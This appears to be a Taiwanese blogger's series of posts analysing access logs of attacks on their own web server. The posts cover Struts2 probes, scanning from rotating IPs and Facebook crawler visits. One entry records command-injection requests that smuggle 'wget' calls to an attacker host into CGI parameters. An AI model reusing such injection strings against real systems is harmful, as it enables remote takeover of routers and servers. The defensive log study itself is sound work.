中國這類的XAMP套裝似乎有不少漏洞, 我被攻擊的log多到不想講了
使用ThinkPHP架站的對方
2019年1月29日 星期二
2019年1月13日 星期日
從 Web Log 學習系統漏洞 33
中國來的攻擊:
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.action HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.do HTTP/1.1" 404 206 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.action HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.do HTTP/1.1" 404 206 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
估狗了一下, 是一個Apache Struts 2.5.X的漏洞攻擊, 藉由一個REST插件進行遠端程式控制, 本以為是Apache的漏洞, 查了一下Apache官網版本才到2.4.37
順便查了一下, Apache Struts 2是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構, 它利用並延伸了Java Servlet API, 鼓勵開發者採用MVC架構
2019年1月9日 星期三
從 Web Log 學習系統漏洞 32
來了個厲害的傢伙(團體?), 大量的攻擊不曉得要做什麼, 可能想要用我的網站做為跳板入侵中國的某些網站, IP 來源多以 43.239.122.130, 43.239.122.1, 43.239.122.3 及 110.249.208.*的網段不斷變換, 查了一下這些 IP 也都是中國來的 (自己人打自己人?)
2019年1月6日 星期日
從 Web Log 學習系統漏洞 31- webuzo
從 Web Log 學習系統漏洞 31
176.88.228.22 - - [05/Jan/2019:22:33:06 +0800] "GET / HTTP/1.1" 200 1855 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.88.228.22 - - [05/Jan/2019:22:33:07 +0800] "GET /maker/snwrite.cgi?mac=1234;wget%20http://93.188.163.62/snwrite HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.88.228.22 - - [05/Jan/2019:22:33:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://93.188.163.62/dsl2750b%27$ HTTP/1.1" 302 260 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
從土耳其176.88.228.22操控美國93.188.163.62一種雲端網路服務伺服器的漏洞 ?
176.88.228.22 - - [05/Jan/2019:22:33:07 +0800] "GET /maker/snwrite.cgi?mac=1234;wget%20http://93.188.163.62/snwrite HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.88.228.22 - - [05/Jan/2019:22:33:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://93.188.163.62/dsl2750b%27$ HTTP/1.1" 302 260 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
從土耳其176.88.228.22操控美國93.188.163.62一種雲端網路服務伺服器的漏洞 ?
2019年1月5日 星期六
從 Web Log 學習系統漏洞 30
不知為何 Facebook 對我的網站有興趣 ? 估狗了一下好像是臉書以粗暴的方式於網址加入fbclid, 藉以干擾 Google Analytics
69.171.251.42 - - [05/Jan/2019:17:23:54 +0800] "GET /robots.txt HTTP/1.1" 206 36 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.149.18 - - [05/Jan/2019:17:31:51 +0800] "GET /?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q HTTP/1.1" 200 1855 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:52 +0800] "GET /index-2.php HTTP/1.1" 200 2093 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:55 +0800] "GET /favicon.png HTTP/1.1" 200 3652 "http://w-studio.idv.tw/index-2.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:56 +0800] "GET /favicon.ico HTTP/1.1" 200 5174 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
69.171.251.42 - - [05/Jan/2019:17:23:54 +0800] "GET /robots.txt HTTP/1.1" 206 36 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.149.18 - - [05/Jan/2019:17:31:51 +0800] "GET /?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q HTTP/1.1" 200 1855 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:52 +0800] "GET /index-2.php HTTP/1.1" 200 2093 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:55 +0800] "GET /favicon.png HTTP/1.1" 200 3652 "http://w-studio.idv.tw/index-2.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:56 +0800] "GET /favicon.ico HTTP/1.1" 200 5174 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"